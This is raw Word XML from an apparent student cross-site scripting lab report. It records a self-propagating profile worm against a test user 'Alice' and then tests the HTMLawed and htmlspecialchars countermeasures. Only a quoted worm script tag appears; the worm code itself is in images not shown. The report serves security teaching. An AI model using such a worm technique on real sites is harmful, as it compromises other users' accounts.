        <w:t>Edit Alice’s profile, and we found that malicious code is saving in Alice’s profile as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0285A28D" w14:textId="764ECDC7" w:rsidR="004673FB" w:rsidRDefault="004673FB" w:rsidP="005933E4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E9055E8" wp14:editId="205E12EE">
            <wp:extent cx="3578316" cy="1990347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8326" cy="19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3744" w14:textId="4120DD1A" w:rsidR="00753225" w:rsidRDefault="00753225" w:rsidP="005933E4">
      <w:r>
        <w:t xml:space="preserve">Thus, we can find the three </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>approach</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A047459" w14:textId="3D7EFE9B" w:rsidR="00753225" w:rsidRDefault="00753225" w:rsidP="005933E4">
      <w:r>
        <w:t>1. Add fake message in viewer’s profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D117916" w14:textId="4BFA4325" w:rsidR="00753225" w:rsidRDefault="00753225" w:rsidP="005933E4">
      <w:r>
        <w:t>2. Add friend with viewers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2682D865" w14:textId="3355DB6D" w:rsidR="005B5E6D" w:rsidRDefault="005B5E6D" w:rsidP="005933E4">
      <w:r>
        <w:t>3. self-propagating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCFA64E" w14:textId="76F73A31" w:rsidR="005B5E6D" w:rsidRDefault="005B5E6D" w:rsidP="005933E4">
      <w:r>
        <w:t>Succeed!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058055A0" w14:textId="679BB3D2" w:rsidR="00477698" w:rsidRDefault="00D82ABE" w:rsidP="00631619">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 7: Countermeasures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E5F92" w14:textId="5C4F14BA" w:rsidR="00631619" w:rsidRDefault="00394571" w:rsidP="00631619">
      <w:r>
        <w:t xml:space="preserve">1. Only </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B37CF" w:rsidRPr="002B37CF">
        <w:t>HTMLawed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5915F7B9" w14:textId="6699AE06" w:rsidR="002B37CF" w:rsidRDefault="000D324F" w:rsidP="00631619">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7250EA7B" wp14:editId="325108E0">
            <wp:extent cx="3773882" cy="1479838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4476" cy="148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19D6" w14:textId="4CF8EDB6" w:rsidR="00BF3C6D" w:rsidRDefault="008B364F" w:rsidP="00631619">
      <w:r>
        <w:t>Log in Alice’s account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF1931D" w14:textId="3CF3A313" w:rsidR="008B364F" w:rsidRDefault="008B364F" w:rsidP="00631619">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="537BA089" wp14:editId="227D535C">
            <wp:extent cx="2304605" cy="2558206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1324" cy="25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E1A6" w14:textId="1A6F605A" w:rsidR="008B364F" w:rsidRDefault="008B364F" w:rsidP="00631619">
      <w:r>
        <w:t>We can see that without changing anything, Alice’s profile shows all the JS codes in the body except the script header.</w:t>
      </w:r>
      <w:r w:rsidR="00775919">
        <w:t xml:space="preserve"> It starts with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00775919">
        <w:t>window.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00775919">
        <w:t xml:space="preserve"> function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD02C58" w14:textId="3D7F1BDC" w:rsidR="00775919" w:rsidRDefault="00E15DCF" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00F202CD">
        <w:t xml:space="preserve"> Uncomment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FDE8A3" w14:textId="617F518B" w:rsidR="00E15DCF" w:rsidRDefault="00E15DCF" w:rsidP="00631619">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50D984BA" wp14:editId="26212B1A">
            <wp:extent cx="3874307" cy="1438522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4284" cy="1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E2D" w14:textId="4993B5D2" w:rsidR="00BE731C" w:rsidRDefault="00DE6327" w:rsidP="00631619">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2011C199" wp14:editId="114BE0C9">
            <wp:extent cx="4186155" cy="1618317"/>
            <wp:effectExtent l="0" t="0" r="508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97968" cy="162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12AE" w14:textId="25B0FCE8" w:rsidR="009D5172" w:rsidRDefault="009D5172" w:rsidP="00631619">
      <w:r>
        <w:t>Restart the server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E30542" w14:textId="023D587D" w:rsidR="009D5172" w:rsidRDefault="009D5172" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> service apache2 </w:t>
      </w:r>
      <w:r w:rsidR="009F23F7">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC1597" w14:textId="297496E0" w:rsidR="00210777" w:rsidRDefault="00A74F52" w:rsidP="00631619">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E65621A" wp14:editId="64C30A72">
            <wp:extent cx="3595073" cy="4693568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836" cy="47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D295" w14:textId="0E8725CD" w:rsidR="001D7FCE" w:rsidRDefault="001D7FCE" w:rsidP="00631619">
      <w:r>
        <w:t>Easily we can notice th</w:t>
      </w:r>
      <w:r w:rsidR="009964A3">
        <w:t xml:space="preserve">at the layout has some changes but there are no changes </w:t>
      </w:r>
      <w:r w:rsidR="001C3780">
        <w:t>for marks like “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001C3780">
        <w:t>&lt;”or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001C3780">
        <w:t xml:space="preserve">”&gt;”. It should be noted that once we turn on the first countermeasure the line </w:t>
      </w:r>
      <w:r w:rsidR="001C3780" w:rsidRPr="001C3780">
        <w:t>&lt;script id="worm" type="text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C3780" w:rsidRPr="001C3780">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C3780" w:rsidRPr="001C3780">
        <w:t>"&gt;</w:t>
      </w:r>
      <w:r w:rsidR="001C3780">
        <w:t xml:space="preserve"> has been removed. </w:t>
      </w:r>
      <w:r w:rsidR="0096073F">
        <w:t xml:space="preserve">The reason why layout changes is that </w:t>
      </w:r>
      <w:r w:rsidR="00BC4A77">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="003E16A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="003E16A1">
        <w:t xml:space="preserve">rap character has been </w:t>
      </w:r>
      <w:r w:rsidR="00271FF3">
        <w:t xml:space="preserve">replaced. To verify whether “&lt;” and “&gt;” can be replaced and save, </w:t>
      </w:r>
      <w:r w:rsidR="003E6FCD">
        <w:t>we edit Alice’s profile and add the line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C1E20A" w14:textId="5C83C033" w:rsidR="003E6FCD" w:rsidRDefault="00277EA4" w:rsidP="00631619">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F7C9942" wp14:editId="6A65C000">
            <wp:extent cx="3092046" cy="1763427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3809" cy="177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C90" w14:textId="14D66FDF" w:rsidR="00277EA4" w:rsidRDefault="00277EA4" w:rsidP="00631619">
      <w:r>
        <w:t>We have known that only with the countermeasure 1, this line will disappear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018E6F8B" w14:textId="4CBDFD95" w:rsidR="00277EA4" w:rsidRDefault="00277EA4" w:rsidP="00631619">
      <w:r>
        <w:t xml:space="preserve">However, after saving and refreshing the page, we </w:t>
      </w:r>
      <w:r w:rsidR="0016219D">
        <w:t>see</w:t>
      </w:r>
      <w:r w:rsidR="00BE70CA">
        <w:t xml:space="preserve"> the result as following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB60BC4" w14:textId="166A41D6" w:rsidR="00BE70CA" w:rsidRDefault="00BE70CA" w:rsidP="00631619">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C9E0B3A" wp14:editId="215948AE">
            <wp:extent cx="2949741" cy="2399639"/>
            <wp:effectExtent l="0" t="0" r="317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8264" cy="24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7D0C" w14:textId="24D794F2" w:rsidR="009175C0" w:rsidRDefault="009175C0" w:rsidP="00631619">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e see that </w:t>
      </w:r>
      <w:r w:rsidR="009C4205">
        <w:t xml:space="preserve">the line we added is shown successfully. Thus, </w:t>
      </w:r>
      <w:r w:rsidR="00BE59D0">
        <w:t>we can draw the conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAD86F" w14:textId="21C20A72" w:rsidR="00BE59D0" w:rsidRDefault="00BE59D0" w:rsidP="00631619"/>
    <w:p w14:paraId="2C177CF3" w14:textId="11011586" w:rsidR="00BE59D0" w:rsidRDefault="00BE59D0" w:rsidP="00631619">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE59D0">
        <w:t>HTMLawed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> countermeasure will simply delete the </w:t>
      </w:r>
      <w:r w:rsidR="00123F10">
        <w:t xml:space="preserve">potential </w:t>
      </w:r>
      <w:r w:rsidR="00EE35BC">
        <w:t xml:space="preserve">tags to </w:t>
      </w:r>
      <w:r w:rsidR="007A05F9">
        <w:t xml:space="preserve">prevent </w:t>
      </w:r>
      <w:r w:rsidR="00927F80">
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidR="00F75D03">
        <w:t xml:space="preserve">. That is why after active </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F75D03" w:rsidRPr="00F75D03">
        <w:t>HTMLawed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F75D03">
        <w:t xml:space="preserve"> the first line of script disappears.</w:t>
      </w:r>
      <w:r w:rsidR="00253F93">
        <w:t xml:space="preserve"> It can suc</w:t>
      </w:r>
      <w:r w:rsidR="008F7976">
        <w:t xml:space="preserve">ceed only because </w:t>
      </w:r>
      <w:r w:rsidR="00562AB8">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F06128">
        <w:t xml:space="preserve">tag is </w:t>
      </w:r>
      <w:r w:rsidR="002F1179">
        <w:t>found by the browser, and the browser delete it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A36E2C" w14:textId="72A0A49B" w:rsidR="002F1179" w:rsidRPr="00F30D14" w:rsidRDefault="0079496A" w:rsidP="00631619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>For the</w:t>
      </w:r>
      <w:r w:rsidR="00F30D14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F30D14">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F30D14">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F30D14">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00F30D14">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F30D14">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">countermeasure, </w:t>
      </w:r>
      <w:r w:rsidR="00964108">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">it changes outputs to the browser </w:t>
      </w:r>
      <w:r w:rsidR="00447F8C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="009D5A88">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">dangerous characters to </w:t>
      </w:r>
      <w:r w:rsidR="00F95190">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">safer characters. This encoding </w:t>
      </w:r>
      <w:r w:rsidR="00B95512">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">process allows us </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008B52CD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B52CD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> whatever in all areas and</w:t>
      </w:r>
      <w:r w:rsidR="00960E4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the browser will not think the encoded characters dangerous.</w:t>
      </w:r>
      <w:r w:rsidR="00F15C5F">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> After changing the meaning of those characters, the </w:t>
      </w:r>
      <w:r w:rsidR="00D22FD0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JS code will not be executed as well.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="002F1179" w:rsidRPr="00F30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0D"/>
    <w:rsid w:val="000010C7"/>
    <w:rsid w:val="000016AE"/>
    <w:rsid w:val="00002F89"/>
    <w:rsid w:val="0000455A"/>
    <w:rsid w:val="000057C5"/>
    <w:rsid w:val="000068A4"/>
    <w:rsid w:val="00007244"/>
    <w:rsid w:val="000079C7"/>
    <w:rsid w:val="00007D54"/>
    <w:rsid w:val="0001034A"/>
    <w:rsid w:val="00010472"/>
    <w:rsid w:val="00010996"/>
    <w:rsid w:val="00011C45"/>
    <w:rsid w:val="00012073"/>
    <w:rsid w:val="00014AD7"/>
    <w:rsid w:val="00016B4F"/>
    <w:rsid w:val="0001778D"/>
    <w:rsid w:val="00020F6E"/>
    <w:rsid w:val="000215B5"/>
    <w:rsid w:val="00024395"/>
    <w:rsid w:val="00026E3C"/>
    <w:rsid w:val="00040D3A"/>
    <w:rsid w:val="00041DCC"/>
    <w:rsid w:val="000428AE"/>
    <w:rsid w:val="00043A25"/>
    <w:rsid w:val="0004404F"/>
    <w:rsid w:val="00044779"/>
    <w:rsid w:val="000464E6"/>
    <w:rsid w:val="0004685A"/>
    <w:rsid w:val="00046CCA"/>
    <w:rsid w:val="00052C7F"/>
    <w:rsid w:val="00054FCC"/>
    <w:rsid w:val="000554BD"/>
    <w:rsid w:val="00061C04"/>
    <w:rsid w:val="00062218"/>
    <w:rsid w:val="00062F4D"/>
    <w:rsid w:val="000630F3"/>
    <w:rsid w:val="000647E2"/>
    <w:rsid w:val="000701EE"/>
    <w:rsid w:val="0007022E"/>
    <w:rsid w:val="000716BA"/>
    <w:rsid w:val="00071D18"/>
    <w:rsid w:val="00071FCA"/>
    <w:rsid w:val="00072B3D"/>
    <w:rsid w:val="00073485"/>
    <w:rsid w:val="00073BFF"/>
    <w:rsid w:val="00074002"/>
    <w:rsid w:val="00074743"/>
    <w:rsid w:val="00081F7C"/>
    <w:rsid w:val="000851FE"/>
    <w:rsid w:val="000875CE"/>
    <w:rsid w:val="000876FD"/>
    <w:rsid w:val="00091C84"/>
    <w:rsid w:val="000B0001"/>
    <w:rsid w:val="000B2105"/>
    <w:rsid w:val="000B332E"/>
    <w:rsid w:val="000B3531"/>
    <w:rsid w:val="000B5844"/>
    <w:rsid w:val="000B5D18"/>
    <w:rsid w:val="000C3602"/>
    <w:rsid w:val="000C43ED"/>
    <w:rsid w:val="000C5F1B"/>
    <w:rsid w:val="000D0444"/>
    <w:rsid w:val="000D324F"/>
    <w:rsid w:val="000D34DE"/>
    <w:rsid w:val="000D5583"/>
    <w:rsid w:val="000D6D19"/>
    <w:rsid w:val="000D780B"/>
    <w:rsid w:val="000D78E9"/>
    <w:rsid w:val="000E143C"/>
    <w:rsid w:val="000E32A8"/>
    <w:rsid w:val="000E3A31"/>
    <w:rsid w:val="000E5141"/>
    <w:rsid w:val="000F2B36"/>
    <w:rsid w:val="000F2D8D"/>
    <w:rsid w:val="000F3051"/>
    <w:rsid w:val="000F4C13"/>
    <w:rsid w:val="000F7270"/>
    <w:rsid w:val="001065F6"/>
    <w:rsid w:val="00106CD7"/>
    <w:rsid w:val="00111272"/>
    <w:rsid w:val="00111496"/>
    <w:rsid w:val="001157A8"/>
    <w:rsid w:val="00121210"/>
    <w:rsid w:val="001239C2"/>
    <w:rsid w:val="00123F10"/>
    <w:rsid w:val="00124B3E"/>
    <w:rsid w:val="00124EBB"/>
    <w:rsid w:val="00125617"/>
    <w:rsid w:val="00125D78"/>
    <w:rsid w:val="00130B55"/>
    <w:rsid w:val="001312E9"/>
    <w:rsid w:val="001317F5"/>
    <w:rsid w:val="0013344F"/>
    <w:rsid w:val="001369CB"/>
    <w:rsid w:val="00140030"/>
    <w:rsid w:val="00141F10"/>
    <w:rsid w:val="00142B48"/>
    <w:rsid w:val="00142DDC"/>
    <w:rsid w:val="00143435"/>
    <w:rsid w:val="0014364B"/>
    <w:rsid w:val="00144D04"/>
    <w:rsid w:val="001455EB"/>
    <w:rsid w:val="0014775C"/>
    <w:rsid w:val="00147A83"/>
    <w:rsid w:val="00147A96"/>
    <w:rsid w:val="00147ED1"/>
    <w:rsid w:val="00150F50"/>
    <w:rsid w:val="00151E13"/>
    <w:rsid w:val="001535C8"/>
    <w:rsid w:val="001536DF"/>
    <w:rsid w:val="00153F30"/>
    <w:rsid w:val="00154591"/>
    <w:rsid w:val="00154D49"/>
    <w:rsid w:val="00154EB5"/>
    <w:rsid w:val="001556F2"/>
    <w:rsid w:val="00160A79"/>
    <w:rsid w:val="0016219D"/>
    <w:rsid w:val="00162673"/>
    <w:rsid w:val="00162719"/>
    <w:rsid w:val="00162873"/>
    <w:rsid w:val="00162C47"/>
    <w:rsid w:val="001636A7"/>
    <w:rsid w:val="00163835"/>
    <w:rsid w:val="001641AE"/>
    <w:rsid w:val="00166779"/>
    <w:rsid w:val="00167197"/>
    <w:rsid w:val="00171A6B"/>
    <w:rsid w:val="00171C9F"/>
    <w:rsid w:val="00173E5A"/>
    <w:rsid w:val="001759C2"/>
    <w:rsid w:val="0017734C"/>
    <w:rsid w:val="001773E1"/>
    <w:rsid w:val="00181139"/>
    <w:rsid w:val="00181342"/>
    <w:rsid w:val="00182F1E"/>
    <w:rsid w:val="00185233"/>
    <w:rsid w:val="00187F93"/>
    <w:rsid w:val="001915A3"/>
    <w:rsid w:val="00196394"/>
    <w:rsid w:val="00196DF4"/>
    <w:rsid w:val="0019738A"/>
    <w:rsid w:val="0019772C"/>
    <w:rsid w:val="001A011E"/>
    <w:rsid w:val="001A07D9"/>
    <w:rsid w:val="001A54EF"/>
    <w:rsid w:val="001A5DBA"/>
    <w:rsid w:val="001B1B62"/>
    <w:rsid w:val="001B227F"/>
    <w:rsid w:val="001B2884"/>
    <w:rsid w:val="001B2B09"/>
    <w:rsid w:val="001B4BFA"/>
    <w:rsid w:val="001C3780"/>
    <w:rsid w:val="001C4473"/>
    <w:rsid w:val="001C4E5E"/>
    <w:rsid w:val="001C5282"/>
    <w:rsid w:val="001C6B1A"/>
    <w:rsid w:val="001D1E9B"/>
    <w:rsid w:val="001D4294"/>
    <w:rsid w:val="001D525F"/>
    <w:rsid w:val="001D5EC6"/>
    <w:rsid w:val="001D7FCE"/>
    <w:rsid w:val="001E3626"/>
    <w:rsid w:val="001E4226"/>
    <w:rsid w:val="001E44B2"/>
    <w:rsid w:val="001F263B"/>
    <w:rsid w:val="001F457C"/>
    <w:rsid w:val="001F710B"/>
    <w:rsid w:val="00200143"/>
    <w:rsid w:val="00201F9D"/>
    <w:rsid w:val="002052D3"/>
    <w:rsid w:val="00210777"/>
    <w:rsid w:val="00215113"/>
    <w:rsid w:val="00215994"/>
    <w:rsid w:val="00216681"/>
    <w:rsid w:val="002205DA"/>
    <w:rsid w:val="0022399B"/>
    <w:rsid w:val="00223CFD"/>
    <w:rsid w:val="00226B13"/>
    <w:rsid w:val="002336BF"/>
    <w:rsid w:val="00234B75"/>
    <w:rsid w:val="002360DA"/>
    <w:rsid w:val="00236D81"/>
    <w:rsid w:val="00241659"/>
    <w:rsid w:val="00243B22"/>
    <w:rsid w:val="002443EC"/>
    <w:rsid w:val="00244D26"/>
    <w:rsid w:val="0025074D"/>
    <w:rsid w:val="00250E5C"/>
    <w:rsid w:val="0025362B"/>
    <w:rsid w:val="002539F1"/>
    <w:rsid w:val="00253F93"/>
    <w:rsid w:val="0025409F"/>
    <w:rsid w:val="0025427B"/>
    <w:rsid w:val="002545C5"/>
    <w:rsid w:val="00255143"/>
    <w:rsid w:val="00256276"/>
    <w:rsid w:val="00257587"/>
    <w:rsid w:val="002634CA"/>
    <w:rsid w:val="0026385C"/>
    <w:rsid w:val="002654C1"/>
    <w:rsid w:val="00267688"/>
    <w:rsid w:val="00267FD2"/>
    <w:rsid w:val="002703D0"/>
    <w:rsid w:val="00270FAE"/>
    <w:rsid w:val="00271FF3"/>
    <w:rsid w:val="0027260B"/>
    <w:rsid w:val="002775E2"/>
    <w:rsid w:val="00277EA4"/>
    <w:rsid w:val="002807AA"/>
    <w:rsid w:val="00281672"/>
    <w:rsid w:val="00282275"/>
    <w:rsid w:val="0028464A"/>
    <w:rsid w:val="0028763F"/>
    <w:rsid w:val="00287D9E"/>
    <w:rsid w:val="00291006"/>
    <w:rsid w:val="002915F9"/>
    <w:rsid w:val="00291DC9"/>
    <w:rsid w:val="002923BD"/>
    <w:rsid w:val="002945D7"/>
    <w:rsid w:val="00297BD8"/>
    <w:rsid w:val="002A1463"/>
    <w:rsid w:val="002A4992"/>
    <w:rsid w:val="002A58E2"/>
    <w:rsid w:val="002A5DF1"/>
    <w:rsid w:val="002B19A6"/>
    <w:rsid w:val="002B2BCA"/>
    <w:rsid w:val="002B37CF"/>
    <w:rsid w:val="002B3899"/>
    <w:rsid w:val="002B7470"/>
    <w:rsid w:val="002B7F71"/>
    <w:rsid w:val="002C151B"/>
    <w:rsid w:val="002C1BBD"/>
    <w:rsid w:val="002C4C81"/>
    <w:rsid w:val="002D138A"/>
    <w:rsid w:val="002D4518"/>
    <w:rsid w:val="002D455A"/>
    <w:rsid w:val="002D47C0"/>
    <w:rsid w:val="002D5D35"/>
    <w:rsid w:val="002E11DA"/>
    <w:rsid w:val="002E3BC6"/>
    <w:rsid w:val="002E42B0"/>
    <w:rsid w:val="002E43BE"/>
    <w:rsid w:val="002E5D10"/>
    <w:rsid w:val="002E6F20"/>
    <w:rsid w:val="002E785A"/>
    <w:rsid w:val="002E7CA7"/>
    <w:rsid w:val="002F1179"/>
    <w:rsid w:val="002F300F"/>
    <w:rsid w:val="002F398C"/>
    <w:rsid w:val="002F5089"/>
    <w:rsid w:val="003033B2"/>
    <w:rsid w:val="00303686"/>
    <w:rsid w:val="00305976"/>
    <w:rsid w:val="00310D1C"/>
    <w:rsid w:val="00315AF2"/>
    <w:rsid w:val="00315B22"/>
    <w:rsid w:val="003165A7"/>
    <w:rsid w:val="00316DBA"/>
    <w:rsid w:val="00316E75"/>
    <w:rsid w:val="00317923"/>
    <w:rsid w:val="00321661"/>
    <w:rsid w:val="00322F87"/>
    <w:rsid w:val="0032463C"/>
    <w:rsid w:val="0033000D"/>
    <w:rsid w:val="003307FA"/>
    <w:rsid w:val="003316AD"/>
    <w:rsid w:val="0033206F"/>
    <w:rsid w:val="003321AF"/>
    <w:rsid w:val="003330F9"/>
